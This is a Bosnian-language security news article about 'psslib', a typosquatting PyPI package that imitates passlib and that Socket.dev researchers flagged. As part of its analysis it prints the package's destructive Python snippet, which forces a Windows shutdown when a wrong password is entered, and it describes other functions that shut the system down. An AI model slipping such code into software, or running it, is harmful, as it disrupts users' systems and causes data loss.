Uočena je opasna aplikacija za programiranje u Pythonu koja se predstavlja kao legitimna biblioteka za sigurnost lozinki, a zapravo uzrokuje trenutna isključenja Windows sistema kod programera koji unesu pogrešne podatke.
Ovaj zlonamjerni paket, nazvan “psslib”, predstavlja sofisticiran napad “typosquattinga” usmjeren na popularnu “passlib” biblioteku, koja bilježi preko 8.9 miliona preuzimanja mjesečno od strane programera koji implementiraju sigurne sisteme provjere autentičnosti.
Malver koristi naročito podmukao pristup iskorištavajući povjerenje programera u pakete fokusirane na sigurnost. Za razliku od klasičnih napada na lanac snabdijevanja, koji se odvijaju prikriveno radi krađe podataka ili uspostavljanja trajnog prisustva, ovaj paket primarno teži neposrednom ometanju umjesto prikrivenim operacijama.
Objavljen od strane entiteta pod nazivom “umaraq”, paket lažno tvrdi da je sigurnosno rješenje koje će “osigurati vaš Python program”, dok u sebi sadrži destruktivni kod dizajniran da prouzrokuje neposrednu štetu sistemu.
Istraživači iz Socket.dev identificirali su zlonamjerni paket zahvaljujući svojim sistemima skeniranja pokretanim umjetnom inteligencijom, koji su označili destruktivno ponašanje sistema kao anomalno za navodnu sigurnosnu biblioteku.
Paket je i dalje aktivan na PyPI-ju uprkos formalnim zahtjevima za njegovim uklanjanjem, nastavljajući da predstavlja rizik za nesvjesne programere koji ga slučajno instaliraju tokom rutinskog upravljanja zavisnostima.
Napad je specifično usmjeren na Windows razvojna okruženja, gdje Python programeri često posjeduju povišene sistemske privilegije neophodne za automatizaciju i razvojne zadatke. Kada ovi programeri integrišu zlonamjerni paket u svoje radne procese, destruktivni teret dobija sistemski nivo pristupa potreban za izvršavanje neposrednih naredbi za gašenje, što potencijalno može dovesti do gubitka podataka i prekida radnih procesa unutar razvojnih timova.
**Tehnička implementacija i mehanizam napada**
psslib paket implementira svoj destruktivni teret kroz naizgled jednostavne Python funkcije koje koriste easygui biblioteku za interakciju s korisnikom i os modul za sistemske komande. Primarni vektor napada usredsređen je na funkciju provjere lozinke koja neposredno pokreće gašenje Windowsa kada korisnici unesu pogrešne akreditive.
“`python
import os
import easygui
def spc(password):
if easygui.enterbox(‘enter password:-‘) != password:
os.system(“shutdown /s /t 1”) # Shutdown in 1 second
“`
Pored gašenja pokrenutog lozinkom, paket uključuje dodatne funkcije dizajnirane za proširenje vektora napada. Funkcija “src()” omogućava direktno gašenje sistema bez ikakvih zahtjeva za autentifikacijom, dok funkcija “error()” kombinuje prikaz poruke o grešci sa izvršavanjem obaveznog gašenja. Ovi višestruki vektori napada osiguravaju da se zlonamjerni teret može izvršiti bez obzira na način na koji programeri integrišu paket u svoje aplikacije, maksimizirajući potencijal za sistemsko ometanje u različitim scenarijima implementacije.